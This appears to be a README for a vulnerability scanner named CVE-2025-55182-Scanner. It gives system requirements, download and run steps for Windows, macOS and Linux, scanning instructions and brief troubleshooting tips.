To run the CVE-2025-55182-Scanner effectively, your system should meet the following requirements:
- Operating System: Windows, macOS, or Linux.
- RAM: At least 2 GB of RAM.
- Disk Space: Minimum of 100 MB of free disk space.
- Dependencies: Python 3.x must be installed. Download Python here.
- Visit the Releases Page: Go to our Releases page to get the latest version.
- Select the Latest Release: Look for the most recent version on the page.
- Download the Files:
- Click on the appropriate file for your operating system.
- If you are unsure, choose the file with the
.exeextension for Windows or a.tar.gzfile for Linux or macOS.
- Running the Scanner:
- For Windows, double-click the downloaded
.exefile. - For Mac, open the terminal and run the command:
tar -xzf downloaded-file.tar.gzfollowed by./scannerto execute. - For Linux, use similar terminal commands as above.
- For Windows, double-click the downloaded
Make sure your application files are ready to be scanned. Place the code you wish to check in an accessible directory.
- For Windows: Just open the application via the shortcut or double-click the file you downloaded.
- For macOS/Linux: Navigate to the directory where your scanner is located in your terminal.
When prompted, enter the path to the application you wish to scan.
Follow the on-screen instructions. The scanner will notify you once the analysis is complete.
Once the scan finishes, review the displayed results. The scanner will point out any vulnerabilities found and suggest how to fix them.
Issue: The application won’t start.
- Ensure that Python 3.x is installed correctly.
- Double-check that you have met all system requirements.
Issue: Results are unclear.
- Review the output step-by-step. If needed, refer to the help section in the application.
